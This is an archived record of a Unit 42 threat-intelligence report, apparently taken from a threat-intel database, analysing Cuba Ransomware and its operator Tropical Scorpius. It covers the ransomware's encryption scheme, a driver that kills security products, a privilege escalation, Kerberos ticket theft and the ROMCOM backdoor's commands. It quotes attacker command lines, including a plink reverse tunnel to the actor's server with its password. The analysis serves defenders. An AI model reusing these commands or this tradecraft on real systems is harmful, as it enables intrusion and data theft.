{
	"id": "ca7bd241-7439-4ed6-96c6-325c108215fa",
	"created_at": "2026-04-06T00:16:43.068321Z",
	"updated_at": "2026-04-10T03:28:28.136631Z",
	"deleted_at": null,
	"sha1_hash": "e6f76326307511f14dd12cd4e709a376bf191b6e",
	"title": "Novel News on Cuba Ransomware: Greetings From Tropical Scorpius",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 12432778,
	"plain_text": "Novel News on Cuba Ransomware: Greetings From Tropical\r\nScorpius\r\nBy Anthony Galiette, Daniel Bunce, Doel Santos, Shawn Westfall\r\nPublished: 2022-08-09 · Archived: 2026-04-05 23:19:36 UTC\r\nExecutive Summary\r\nBeginning in early May 2022, Unit 42 observed a threat actor deploying Cuba Ransomware using novel tools and\r\ntechniques. Using our naming schema, Unit 42 tracks the threat actor as Tropical Scorpius.\r\nHere, we start with an overview of the ransomware and focus on an evolution of behavior observed leading up to\r\ndeployment of Cuba Ransomware. While this behavior was consistent for over a year, Unit 42 has observed some\r\nrecent changes. This includes providing an overview of the ransomware’s functionality and algorithms, as well as\r\ncovering the technical details of the tactics, techniques and procedures (TTPs) used by Tropical Scorpius.\r\nSpecifically, this involves:\r\nA new malware family that Unit 42 tracks as ROMCOM RAT.\r\nA weaponized local privilege escalation exploit to SYSTEM.\r\nA new Kerberos tool that Unit 42 tracks as KerberCache.\r\nA kernel driver for targeting security products.\r\nIdentifying the use of the ZeroLogon hacktool.\r\nPalo Alto Networks customers receive protections from the threats described in this blog through our Cloud-Delivered Security Services, namely Advanced Threat Prevention. Customers also receive protections from Cortex\r\nXDR and WildFire malware analysis.\r\nIf you think you may have been impacted by a cyber incident, the Unit 42 Incident Response team is available\r\n24/7/365. 
You can also take preventative steps by requesting any of our cyber risk management services.\r\nFull visualization of the techniques observed, relevant courses of action and indicators of compromise (IoCs)\r\nrelated to this report can be found in the Unit 42 ATOM viewer.\r\nRelated Unit 42 Topics: Ransomware\r\nNames for threat actor group deploying Cuba Ransomware: Tropical Scorpius, UNC2596\r\nTropical Scorpius Overview: How Cuba Ransomware Has Been Deployed\r\nThe Cuba Ransomware family first surfaced in December 2019. The threat actors behind this ransomware family\r\nhave since changed their tactics and tooling to become a more prevalent threat in 2022. This ransomware has\r\nhistorically been distributed through Hancitor, which is usually delivered through malicious attachments. Tropical\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 1 of 32\n\nScorpius has also been observed exploiting vulnerabilities in Microsoft Exchange Server, including ProxyShell\r\nand ProxyLogon.\r\nThis ransomware group uses double extortion alongside a leak site that exposes organizations that have allegedly\r\nbeen compromised (Figures 1a and 1b). That said, this group didn’t have a leak site when first observed in 2019;\r\nwe suspect the inspiration for adding one came from other ransomware groups such as Maze and REvil. The Cuba\r\nRansomware leak site also includes a paid section where the threat actors share leaks that were sold to an\r\ninterested party.\r\nFigure 1a. A screenshot from the leak site used by Cuba Ransomware, focused on the content the\r\ngroup makes freely available.\r\nFigure 1b. A screenshot of the section of the Cuba Ransomware group’s leak site where data is\r\noffered for sale.\r\nTropical Scorpius Victimology\r\nThe most recent Unit 42 Ransomware Threat Report includes observations of Cuba Ransomware impacting 33\r\norganizations. 
As of July 2022, Tropical Scorpius has used Cuba Ransomware to impact 27 additional\r\norganizations across multiple sectors, such as Professional and Legal Services, State and Local Government,\r\nManufacturing, Transportation and Logistics, Wholesale and Retail, Real Estate, Financial Services, Health Care,\r\nHigh Technology, Utilities and Energy, Construction, and Education. A total of 60 organizations were exposed by\r\nthis ransomware gang on its leak site since the group first surfaced in 2019.\r\nWe suspect the number of victims is larger than the leak site shows since ransomware operators usually don’t\r\nrelease the data publicly if the victim pays the ransom. That said, the FBI says the Cuba Ransomware gang made\r\nat least $43.9 million from ransom payments and has demanded at least $74 million.\r\nFigure 2. Organizations appearing on the Cuba Ransomware leak site, distributed by industry.\r\nWe observed that this ransomware gang’s leak site does not include as global a distribution of targeted\r\norganizations as other ransomware gangs operating right now. While leak sites don’t reflect the actual number of\r\nvictims impacted by this ransomware group, they still give us a general idea of a group’s targets and objectives.\r\nWe noticed that out of the 60 victims listed on the Cuba Ransomware leak site, 40 were located in the United\r\nStates – 66% of the total number of allegedly breached organizations. By contrast, only about 30% of the\r\nallegedly breached organizations on the LockBit leak site are located in the U.S.\r\nFigure 3. Geographic distribution of organizations targeted by Cuba Ransomware, according to the\r\ngroup’s leak site.\r\nIndustrial Spy and Tropical Scorpius\r\nIn May 2022, BleepingComputer reported that the marketplace Industrial Spy was moving into the ransomware\r\nbusiness. 
After emerging in April 2022, Industrial Spy became known as a site where threat actors can sign up to\r\nbuy stolen data from breached companies. The extension into ransomware, while a related type of malicious\r\nactivity, also appears to have a connection to Tropical Scorpius.\r\nFigure 4. Industrial Spy landing page.\r\nBleepingComputer reports that the ransom note used by Industrial Spy ransomware bears substantial resemblance\r\nto a Cuba ransom note, with both notes containing the exact same contact information. It’s worth mentioning that\r\nransomware groups usually copy ransom notes from other groups for their own samples, but we believe there is\r\nmore to this relationship.\r\nUnit 42 observed a Cuba Ransomware payload used to encrypt the files on a compromised system, appending the\r\n.cuba extension to the files – but then observed that the exfiltrated data was posted for sale on the Industrial Spy\r\nmarketplace.\r\nWe are still unsure why the Tropical Scorpius threat actors decided to leverage the Industrial Spy marketplace\r\nrather than their own leak site; however, due to the findings published by BleepingComputer and this curious\r\nincident, we believe there is more involvement between the two than originally thought.\r\nRansomware Functionality\r\nWhile it is clear the Tropical Scorpius threat actors are constantly developing and updating their toolkit, the core\r\nCuba Ransomware payload has remained roughly the same since its discovery in 2019. The cryptographic\r\nalgorithms are still taken from WolfSSL’s open source repository, specifically ChaCha for file encryption and RSA\r\nfor key encryption.\r\nFigure 5. 
Code overlap between Cuba Ransomware and WolfSSL’s RSA encrypt functionality.\r\nLike most ransomware families, Cuba Ransomware encrypts files differently depending on their size. If the\r\nfile is less than 0x200000 bytes in length, the entire file is encrypted. If not, Cuba Ransomware encrypts the files\r\nin chunks of 0x100000 bytes, with the spacing between the encrypted chunks differing based on the overall size.\r\nFor example, a file with a size between 0x200000 bytes and 0xA00000 bytes will have a chunk encrypted every\r\n0x400000 bytes until the file’s end.\r\nFigure 6. Determination of chunk spacing prior to file encryption.\r\nFile Size | Chunk Size | Chunk Spacing\r\nLess than 0x200000 | Entire Size | N/A\r\nBetween 0x200000 \u0026 0xA00000 | 0x100000 | 0x400000\r\nBetween 0xA00000 \u0026 0x3200000 | 0x100000 | 0x800000\r\nBetween 0x3200000 \u0026 0xC800000 | 0x100000 | 0x1000000\r\nBetween 0xC800000 \u0026 0x280000000 | 0x100000 | 0xC800000\r\nGreater than 0x280000000 | 0x100000 | 0x1F400000\r\nTable 1. Chunk spacing based on file sizes within Cuba Ransomware.\r\nEach encrypted file is also prepended with an initial 1024-byte header, containing the magic value FIDEL.CA\r\n(likely in reference to Fidel Castro, following the Cuba theme), followed by an RSA-4096 encrypted block\r\ncontaining the file-specific ChaCha key and nonce. After successfully encrypting a file, the extension .cuba is\r\nappended to the filename.\r\nFigure 7. 
FIDEL.CA magic value followed by encrypted RSA blob.\r\nAs discussed by Trend Micro, the developers of Cuba Ransomware have built onto the list of targeted processes\r\nand services that will be terminated on runtime, as well as increasing the number of directories and extensions to\r\navoid encrypting.\r\nTargeted processes and services:\r\nMySQL\r\nMySQL82SQLSERVERAGENT\r\nMSSQLSERVER\r\nSQLWriter\r\nSQLTELEMETRY\r\nMSDTC\r\nSQLBrowser\r\nsqlagent.exe\r\nsqlservr.exe\r\nsqlwriter.exe\r\nsqlceip.exe\r\nmsdtc.exe\r\nsqlbrowser.exe\r\nvmcompute\r\nvmms\r\nvmwp.exe\r\nvmsp.exe\r\noutlook.exe\r\nMSExchangeUMCR\r\nMSExchangeUM\r\nMSExchangeTransportLogSearch\r\nMSExchangeTransport\r\nMSExchangeThrottling\r\nMSExchangeSubmission\r\nMSExchangeServiceHost\r\nMSExchangeRPC\r\nMSExchangeRepl\r\nMSExchangePOP3BE\r\nMSExchangePop3\r\nMSExchangeNotificationsBroker\r\nMSExchangeMailboxReplication\r\nMSExchangeMailboxAssistants\r\nMSExchangeIS\r\nMSExchangeIMAP4BE\r\nMSExchangeImap4\r\nMSExchangeHMRecovery\r\nMSExchangeHM\r\nMSExchangeFrontEndTransport\r\nMSExchangeFastSearch\r\nMSExchangeEdgeSync\r\nMSExchangeDiagnostics\r\nMSExchangeDelivery\r\nMSExchangeDagMgmt\r\nMSExchangeCompliance\r\nMSExchangeAntispamUpdate\r\nMicrosoft.Exchange.Store.Worker.exe\r\nAvoided directories:\r\n\\windows\\\r\n\\program files\\microsoft office\\\r\n\\program files (x86)\\microsoft office\\\r\n\\program files\\avs\\\r\n\\program files (x86)\\avs\\\r\n\\$recycle.bin\\\r\n\\boot\\\r\n\\recovery\\\r\n\\system volume information\\\r\n\\msocache\\\r\n\\users\\all users\\\r\n\\users\\default user\\\r\n\\users\\default\\\r\n\\temp\\\r\n\\inetcache\\\r\n\\google\\\r\nAvoided extensions:\r\n.exe\r\n.dll\r\n.sys\r\n.ini\r\n.lnk\r\n.vbm\r\n.cuba\r\nAnother major update can be found within the ransom note dropped by the 
ransomware; rather than rely solely on\r\ntheir Tor site, they are also offering communication via TOX, which is slowly becoming more popular among\r\nransomware groups due to its secure messaging functionality.\r\nFigure 8. Ransom note dropped by Cuba Ransomware group.\r\nDefense Evasion\r\nUnit 42 observed Tropical Scorpius prior to the deployment of ransomware, using some interesting tools and\r\ntechniques to evade detection and move around in the compromised environment.\r\nTropical Scorpius leveraged a dropper that writes a kernel driver to the file system called ApcHelper.sys. This\r\ndriver targets and terminates security products. The dropper was not signed; however, the kernel driver was signed using\r\nthe certificate found in the LAPSUS NVIDIA leak.\r\nFigure 9. Kernel driver digital signature.\r\nUpon executing the kernel driver dropper/loader, the kernel dropper uses multiple Windows APIs for finding the\r\nresource section and loading the resource type name called Driver. This is an embedded PE file and is the driver\r\nthat will ultimately be written to the file system in subsequent API calls.\r\nFigure 10. 
Kernel dropper resource section.\r\nAfter the kernel driver drops onto the file system, the loader will first run a deletion command argument via\r\ncmd.exe for the file path.\r\nAfter this, it will create a new service using cmd.exe and run the argument below to set up a service for the kernel\r\ndriver.\r\nThen the loader copies the kernel driver responsible for terminating security products onto the file system.\r\nThe core functionality of the kernel driver dropped and loaded is to resolve additional kernel APIs for performing\r\nfunctionality and targeting a list of security products for termination.\r\nThe additional APIs are resolved using a string constant for the desired API name; each Windows API below is\r\nused in a function call to MmGetSystemRoutineAddress for returning a pointer to the function. Below is a list of\r\nadditional kernel APIs resolved that were found within the sample.\r\nFigure 11. Kernel driver runtime APIs.\r\nThe list of security products targeted overlaps with the list of targets previously observed in the tool called\r\n“BURNTCIGAR” as discussed by Mandiant. This particular kernel driver is a variant of what Mandiant observed.\r\nFigure 12. Security products targeted.\r\nAfter the additional APIs are resolved, the process of targeting security products begins (products targeted are in\r\nFigure 12 above). A do-while loop is set up (loop is shown in Figure 13 below) with the objective of checking the\r\nprocesses running on the system to see if they match an item from the security products targeted. This naming\r\ncheck is performed by looking up each ThreadID and calling the function PsLookupThreadByThreadId, which\r\nwill be used to find a pointer to the ETHREAD structure of the thread. 
The ETHREAD structure is a kernel object\r\nmaintaining various references to important process/thread structures and objects needed by the operating system\r\nfor tasking and execution by the CPU. The pointer to ETHREAD that is returned is used in the function\r\nPsIsThreadTerminating to make sure a thread is not terminating.\r\nThen if a thread object exists, to find the process the thread belongs to, the function PsGetThreadProcess is used\r\nand the returned value is PEPROCESS. PEPROCESS is a kernel object representation of a process object which\r\nmaintains pointers to where process-related information is stored. If PEPROCESS does exist for the associated\r\nthread, the ImageFileName offset is then assigned to a variable in the instance of the decompiled output; this is the\r\nvariable named “v3” in Figure 13. The variable “v3” will then have the process image file name for the current\r\nthread/process in the loop, which could be any active process on a computer system.\r\nThe next part of performing the name check is the inner if-then statement that uses two parameters in the strstr\r\nfunction. The first parameter is the process image filename from the PEPROCESS structure’s ImageFileName.\r\nThe second parameter is a substring search of the security product’s name to compare against the first parameter.\r\n(For example, does the name Sophos exist in the ImageFileName process name string?)\r\nIf there is a match, the next function, called sub_140001BE0 (shown being called in Figure 13 below), will check\r\nif the status code of the thread is set to status pending. If this evaluates as true, then a subroutine will be called\r\nusing ZwTerminateProcess for termination. The thread object will be dereferenced and the loop will continue to\r\nthe next thread to start evaluating again for termination.\r\nFigure 13. 
Example of kernel driver decompiled.\r\nThe change of tactics by Tropical Scorpius is to make use of the expired legitimate NVIDIA certificate, as well as\r\nuse of their own driver targeting security products for termination. This is a noteworthy change compared to\r\npublicly observed exploitation of an undocumented IOCTL (Input/Output Control system calls) in previous\r\nversions of the vulnerable BURNTCIGAR driver.\r\nLocal Privilege Escalation\r\nThe local privilege escalation tool leveraged by Tropical Scorpius was initially downloaded from the web hosting\r\nplatform tmpfiles[.]org by using PowerShell’s Invoke-WebRequest.\r\nUnit 42 observed the actor leverage a binary that abused CVE-2022-24521, a vulnerability in the Common Log\r\nFile System (CLFS). The exploit abused a logic bug in CLFS.sys, specifically in the\r\nCClfsBaseFilePersisted::LoadContainerQ() function. Malformed BLF files were used to corrupt the pContainer\r\nfield of a container context object with a user-mode address to gain code execution. The code execution was used\r\nto steal the System token and elevate privileges. A detailed write-up of this vulnerability and the exploitation\r\nstrategy was provided by Sergey Kornienko of PixiePoint Security on April 25, 2022.\r\nThe Tropical Scorpius threat actor likely used this post as a guide to build the exploit since the exploitation\r\nstrategy used is identical to what Sergey described, including the pipe attributes heap exploitation method to spray\r\nthe heap.\r\nThis technique was covered in detail by Corentin Bayet and Paul Fariello of Synacktiv at the Symposium on\r\nInformation and Communications Technology Security (SSTIC) in 2020.\r\nTicket to Lateral Movement\r\nThe Tropical Scorpius threat actor leveraged various tools for the initial system reconnaissance. 
ADFind and Net\r\nScan were downloaded from the web hosting platform tmpfiles[.]org by using PowerShell’s Invoke-WebRequest.\r\nBoth tools were dropped onto the same system with shortened names to obscure their purpose.\r\nCredential preparation and collection on lower-privilege systems was performed using a PowerShell-based script,\r\nGetUserSPNs.ps1. This particular script was observed on three different systems, where it identified user accounts\r\nbeing used as service accounts. The threat actor used this process to pinpoint accounts worth targeting for their\r\nassociated Active Directory Kerberos ticket, in order to collect and crack the Kerberos ticket offline via the\r\ntechnique called Kerberoasting.\r\nAdditional activity related to credential theft was observed approximately one week after the use of\r\nGetUserSPNs.ps1, with the observation of Mimikatz on a user's workstation being written into the user’s\r\ndocument folder as a zipped file. Mimikatz is a well-known credential theft tool that contains various options for\r\ntargeting parts of the operating system where credentials can potentially be found.\r\nAround the time that Mimikatz was observed, a custom hacktool was observed on another workstation. This tool,\r\nintended for extracting cached Kerberos tickets from a host’s LSASS memory, was dropped into a user’s\r\ndocuments folder.\r\nUnit 42 is naming the Kerberos tool used by Tropical Scorpius in terms of its overall objective: KerberCache. A\r\nscreenshot of the tool’s output was taken, displaying the parsed data the tool generates (Figure 14).\r\nFigure 14. 
KerberCache ticket extraction example.\r\nUnder the hood, KerberCache will call the API LsaConnectUntrusted to get a handle used for subsequent calls.\r\nFollowing the returned handle, the call to LsaLookupAuthenticationPackage is then given the package named\r\nKerberos along with the handle from the previous API call to LsaConnectUntrusted. If the function succeeds, it\r\nwill call the API LsaCallAuthenticationPackage. Below (Figure 15) is a snippet of the function’s flow once called,\r\nwhere the decompiled formatting and parsing takes place.\r\nFigure 15. Ticket parsing decompiled example.\r\nUpon successful retrieval of cached Kerberos tickets, the ticket will be passed to a function for base64-encoding\r\nthe data and will be written to the current working directory in which the tool was executed. The naming\r\nconvention output for the tool can be broken into the following sections: [user@servername]_[encryption_type].\r\n[ticket_number].kirbi. The actual ticket naming convention, when written to the file system, appears as the\r\nfollowing example output: krbtgt@CORP.INTERNAL_18.0.kirbi.\r\nFigure 16. Ticket encoding decompiled example.\r\nTo Domain Admin\r\nThe Domain Admin tool leveraged by Tropical Scorpius was initially downloaded from the web hosting platform\r\ntmpfiles[.]org by using PowerShell’s Invoke-WebRequest. The sample was packed using the Anti-VM features of\r\nThemida, a well-known commercial packing tool. It was also masquerading as the filename Filezilla.\r\nUpon execution, if running in a virtualized environment, the packer will display the following message:\r\nFigure 17. Themida Anti-VM example.\r\nThe unique commands associated with the hacktool provide high confidence that Zero.exe is the ZeroLogon hacktool. 
The\r\nZeroLogon hacktool is used to abuse CVE-2020-1472 to gain Domain Administrator (DA) privileges by\r\nrequesting an NTLM hash from the domain controller.\r\nFigure 18. ZeroLogon hacktool packed example.\r\nIt has been noted publicly that the ZeroLogon hacktool has gained popularity among other malware families as\r\npart of their attack chain in the crimeware space with overlap on intrusions related to Qbot and Hancitor.\r\nCommand and Control\r\nAlongside the aforementioned tools, Unit 42 also discovered a custom remote access Trojan/backdoor containing\r\na unique command and control (C2) protocol. Based on the strings within the binary as well as the functionality,\r\nwe’ve opted to name it ROMCOM RAT.\r\nROMCOM RAT can be executed through the use of one of its two exports:\r\nServiceMain\r\nstartWorker\r\nBoth exports lead to the execution of the same function; however, the difference is the string passed as a\r\nparameter: ServiceMain passes the string _inet, while startWorker passes the string _file. Based on this string\r\nalone, the flow of execution within the sample is completely different, with ServiceMain causing the sample to\r\nbeacon out to its C2 server, and startWorker resulting in the sample opening a backdoor on the system and waiting\r\nfor connections.\r\nServiceMain Export\r\nUpon execution of the ServiceMain export, ROMCOM will execute the following command line:\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe\r\nC:\\\\Windows\\\\System32\\\\comDll.dll,startWorker\r\nThis will lead to the execution of the startWorker export, meaning both exports will be active on a machine,\r\npresuming ROMCOM was initially executed through a service.\r\nFigure 19. 
Execution of ROMCOM sample through rundll32.exe with startWorker argument.\r\nFrom there, ROMCOM will gather system and user information, and attempt to send it to a hardcoded C2 server\r\nvia the WinHTTP API. If this is successful, the response is parsed and dealt with accordingly.\r\nFigure 20. ICMP capabilities offered within ROMCOM.\r\nFigure 21. Command handling of the packet received from C2.\r\nIf the connection fails, ROMCOM attempts to connect to and communicate with the C2 server using ICMP\r\nrequests. Using Windows API functions such as IcmpCreateFile() and IcmpSendEcho(), it will attempt to resend\r\nthe system and user information to the server until a response is received. Once a response is received, it is parsed\r\nin the same way the HTTP response will be parsed.\r\nFigure 22. ICMP request functionality.\r\nIf the fourth byte of the response is equal to 9, ROMCOM will sleep for 120,000 milliseconds. If the fourth byte is\r\nset to 5, the response will contain a size for follow-up data, and so memory is allocated before a second request is\r\nmade to the C2, using either HTTP or ICMP depending on the last protocol in use.\r\nThe received data from this second request is then passed into a function that first connects to the local address\r\n127.0.0[.]3 over a port between 5555 and 5600, and then sends the C2 received data. The function then returns,\r\nand then ROMCOM binds to 127.0.0[.]2:5555, where it will wait for a connection and forward any data received\r\nfrom that connection to its C2 server.\r\nFigure 23. 
Connecting to local socket server hosted by ROMCOM startWorker process.\r\nThis leads nicely into a discussion of the startWorker export.\r\nstartWorker Export\r\nThe startWorker export passes the string _file to the main function of ROMCOM, which results in the code\r\nexecuted by the ServiceMain export being skipped. Instead, startWorker begins by opening a socket object and\r\nattempting to bind to the IP 127.0.0[.]3, and the port 5555. However, if the port is already in use, ROMCOM will\r\nincrement the port value and attempt to bind once again. This loop continues until ROMCOM has bound to an\r\nunused port, or until the port value reaches 5600, at which point it is set to 5554 and the loop restarts.\r\nFigure 24. Setting up local socket server.\r\nOnce ROMCOM has successfully bound to a port, it begins listening for an incoming connection – this will be\r\nfulfilled by the process that executed the ServiceMain export. When an incoming connection is received, a thread will be spawned that will handle any requests from the\r\nconnected client.\r\nFigure 25. 
Command handler.\r\nTable 2 can be seen below, containing the list of accepted commands and their purpose.\r\nCommand Value | Purpose\r\n1 | Return connected drive information\r\n2 | Return file listings for specified directory\r\n3 | Start up a reverse shell under the name svchelper.exe within the %ProgramData% folder\r\n4 | Upload data to C2 as ZIP file, using IShellDispatch to copy files\r\n5 | Download data and write to worker.txt in the %ProgramData% folder\r\n6 | Delete a specified file\r\n7 | Delete a specified directory\r\n8 | Spawn a process with PID Spoofing\r\n9 | Only handled by ServiceMain, received from C2 server and instructs the process to sleep for 120,000 ms\r\n10 | Iterate through running processes and gather process IDs\r\nTable 2. Supported backdoor commands and their functionality.\r\nEssentially, this particular execution structure results in the ROMCOM sample running as a service receiving\r\ncommands via HTTP/ICMP requests to and from its C2 servers, before passing those commands on to the\r\nROMCOM sample that was executed through rundll32.exe. The commands are executed, with the results passed\r\nback to the service-executed ROMCOM payload. Finally, the results are posted to the C2 server, either via an\r\nHTTP or ICMP request.\r\nROMCOM 2.0\r\nIt appears that ROMCOM is under active development, as we were able to discover a similar sample uploaded to\r\nVirusTotal (VT) on June 20, 2022, that was communicating to the same C2 server.\r\nThe original sample was dated April 10, 2022, while this sample had a file header timestamp of May 28, 2022,\r\nand was ~400 KB larger. It shared the same startWorker and ServiceMain exports; however, it also contained a\r\nthird export denoted as startInet. 
It is important to note the increase in debug strings found within the sample,\r\nwhich could indicate that the sample was caught by antivirus software prior to development completion; this\r\ntheory is further supported by the VT uploader ID (22b3c7b0) having uploaded millions of files in the past, which\r\nrules out any one individual uploading it themselves.\r\nWithin this version, ServiceMain will execute the ROMCOM 2.0 sample twice, initially executing the startInet\r\nexport, and then proceeding to execute the startWorker export. However, rather than simply calling\r\nCreateProcessA like the original ROMCOM sample, the developers have placed a larger focus on using COM\r\nobjects for execution.\r\nFigure 26. Execution of startInet and startWorker exports.\r\nEach process is spawned as a task on the system, using a variety of COM interfaces offered by the Task Scheduler.\r\nROMCOM 2.0 will first get the tasks root folder by calling ITaskService-\u003eGetFolder. It then deletes any existing\r\ntasks with the same name as the task that will be created using ITaskFolder-\u003eDeleteTask.\r\nTask Name | Export\r\ntask7 | startInet\r\ntask6 | startWorker\r\ntask1 | startWorker – if not already running when startInet is executing\r\nTable 3. Names of tasks registered through the Task Scheduler COM interfaces.\r\nAn empty task is created with ITaskService-\u003eNewTask, and the security principal is then modified using\r\nIPrincipal-\u003eput_Id to set the identifier as NT AUTHORITY\\\\SYSTEM, using IPrincipal-\u003eLogonType to set the\r\nlogon type to TASK_LOGON_INTERACTIVE_TOKEN, and using IPrincipal-\u003eput_RunLevel to set the run level\r\nas TASK_RUNLEVEL_HIGHEST.\r\nFigure 27. 
Task creation with SYSTEM privileges.\r\nA delay of 0 seconds is set for the task, using IRegistrationTrigger-\u003ePutDelay, indicated by the string PT0S,\r\nresulting in the task executing immediately upon creation.\r\nFigure 28. Creation of task trigger, with delay set to 0 seconds.\r\nFinally, an action is set for the task, with the action path set to rundll32.exe and the argument set to\r\nC:\\\\Windows\\\\system32\\\\mskms.dll,ARGUMENT, where ARGUMENT is either startWorker or startInet,\r\ndepending on the export passed.\r\nFigure 29. Creation of task action, resulting in rundll32.exe executing mskms.dll.\r\nOnce registered, the task is triggered, which results in execution of the ROMCOM 2.0 main functionality. This\r\nfollows the same structure as the original sample, with the startInet process reaching out to a hardcoded C2 server\r\nand passing any responses to the startWorker process to handle accordingly. The developers have also expanded\r\non the list of handled commands, adding 10 more alongside the existing 10 commands. These include\r\ndownloading payloads specifically designed to take single or multiple screenshots of a system, as well as\r\nextracting a list of all installed programs to send back to the C2 (see the SCREENSHOOTER string reference\r\nshown in Figure 30).\r\nFigure 30. 
Downloading the described SCREENSHOOTER payload.\r\nCommand\r\nValue\r\nPurpose\r\n1 Return connected drive information\r\n2 Return file listings for specified directory\r\n3 Start up a reverse shell under the name winconhost.exe within the %TMP% folder\r\n4 Upload data to C2 as ZIP file, using IShellDispatch to copy files\r\n5 Download data and write to worker.txt in the %TMP% folder\r\n6 Delete a specified file\r\n7 Delete a specified directory\r\n8 Spawn a process with PID Spoofing\r\n9\r\nOnly handled by startInet, received from C2 server and instructs the process to sleep for a\r\nrandom amount of time\r\n10 Get Process IDs of specific processes\r\n12\r\nExecute rundll32.exe %TMP%\\\\PhotoDirector.dll,startWorker single and upload\r\n%TMP%\\\\PhotoDirector.zip to C2 server (likely used to take a single screenshot)\r\n13 Execute rundll32.exe %TMP%\\\\PhotoDirector.dll,startWorker\r\n14 Upload %TMP%\\\\PhotoDirector.zip to C2 server \r\n15 Retrieve all running processes and process IDs \r\n16\r\nGet list of installed software by querying\r\nSOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall or\r\nSOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\r\n18 Write received file SCREENSHOOTER to %TMP%\\\\PhotoDirector.dll\r\n19\r\nCreate %TMP%\\\\BrowserData folder, and write received file to\r\n%TMP%\\\\BrowserData\\\\explorer.exe before executing\r\n20 Write received file to and spawn %TMP%\\\\win_sshd.exe, described as FreeSSHd\r\n21\r\nReferences plink.exe -ssh -pw AeM8soequ@ooNg -R 9999:4444\r\nponcho@CombinedResidency.org\\n, however appears to only execute C:\\\\Program Files\r\n(x86)\\\\freeSSHd\\\\FreeSSHDService.exe\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 29 of 32\n\n22 Terminate svcnet.exe, FreeSSHDService.exe, and plink.exe\r\nTable 4. 
ROMCOM 2.0 supported commands.\r\nProtections and Mitigations\r\nWe recommend leveraging the indicators of compromise (IoCs) below to identify any impacts to your\r\norganization.\r\nPalo Alto Networks detects and prevents Cuba Ransomware and Tropical Scorpius activity in the following ways:\r\nCortex XDR with\r\nDetection for all indicators for Cuba Ransomware and related activity.\r\nAnti-Ransomware module to detect Cuba Ransomware encryption behaviors on Windows systems.\r\nLocal Analysis detection for Cuba Ransomware and ROMCOM RAT binaries on Windows\r\nenvironments.\r\nBehavioral Threat Protection rule prevents execution of related indicators.\r\nWildFire: All known samples are identified as malware.\r\nThreat Prevention provides protection against Tropical Scorpius infrastructure.\r\nAdvanced URL Filtering and DNS Security identify domains associated with this group as malicious.\r\nIndicators of compromise and associated TTPs can be found in the Tropical Scorpius ATOM.\r\nIf you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nIf you have cyber insurance, you can request Unit 42 by name. You can also take preventative steps by requesting\r\nany of our cyber risk management services.\r\nConclusion\r\nTropical Scorpius remains an active threat. 
The group’s activity makes it clear that an approach to tradecraft using\r\na hybrid of more nuanced tools focusing on low-level Windows internals for defense evasion and local privilege\r\nescalation can be highly effective during an intrusion.\r\nCoupled with a splash of well-adopted and successful crimeware techniques, this presents unique challenges to\r\ndefenders.\r\nUnit 42 recommends that defenders have advanced logging capabilities deployed and configured properly such as\r\nSysmon, Windows Command Line logging and PowerShell logging – ideally forwarding to a Security Information\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 30 of 32\n\nand Event Management tool (SIEM) to create queries and detection opportunities. Keep computer systems\r\npatched and up to date wherever possible to reduce attack surface related to exploitation techniques.\r\nDeploy an XDR/EDR solution to perform in-memory inspection and detect process injection techniques. Perform\r\nthreat hunting looking for signs of unusual behavior related to security product defense evasion, service accounts\r\nfor lateral movement and domain administrator-related user behavior.\r\nIndicators of Compromise\r\nDriver Dropper:\r\n07905de4b4be02665e280a56678c7de67652aee318487a44055700396d37ecd0\r\naf6561ad848aa1ba53c62a323de230b18cfd30d8795d4af36bf1ce6c28e3fd4e\r\n24e018c8614c70c940c3b5fa8783cb2f67cb13f08112430a4d10013e0a324eaa\r\nZeroLogon Hacktool:\r\nab5a3bbad1c4298bc287d0ac8c27790d68608393822da2365556ba99d52c5dfb\r\n6866e82d0f6f6d8cf5a43d02ad523f377bb0b374d644d2f536ec7ec18fdaf576\r\n3febf726ffb4f4a4186571d05359d2851e52d5612c5818b2b167160d367f722c\r\n3a8b7c1fe9bd9451c0a51e4122605efc98e7e4e13ed117139a13e4749e211ed0\r\n36bc32becf287402bf0e9c918de22d886a74c501a33aa08dcb9be2f222fa6e24\r\n1450f7c85bfec4f5ba97bcec4249ae234158a0bf9a63310e3801a00d30d9abcc\r\nCuba 
Ransomware:\r\n0a3517d8d382a0a45334009f71e48114d395a22483b01f171f2c3d4a9cfdbfbf\r\n0eff3e8fd31f553c45ab82cc5d88d0105626d0597afa5897e78ee5a7e34f71b3\r\nPrivilege Escalation Tool:\r\na4665231bad14a2ac9f2e20a6385e1477c299d97768048cb3e9df6b45ae54eb8\r\nKerberCache Hacktool:\r\ncfe7b462a8224b2fbf2b246f05973662bdabc2c4e8f4728c9a1b977fac010c15\r\nROMCOM RAT:\r\nB5978cf7d0c275d09bedf09f07667e139ad7fed8f9e47742e08c914c5cf44a53\r\n324ccd4bf70a66cc14b1c3746162b908a688b2b124ad9db029e5bd42197cfe99\r\nInfrastructure:\r\nCombinedResidency[.]org\r\noptasko[.]com\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 31 of 32\n\nSource: https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 32 of 32",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/"
	],
	"report_names": [
		"cuba-ransomware-tropical-scorpius"
	],
	"threat_actors": [
		{
			"id": "d4b9608d-af69-43bc-a08a-38167ac6306a",
			"created_at": "2023-01-06T13:46:39.335061Z",
			"updated_at": "2026-04-10T02:00:03.291149Z",
			"deleted_at": null,
			"main_name": "LAPSUS",
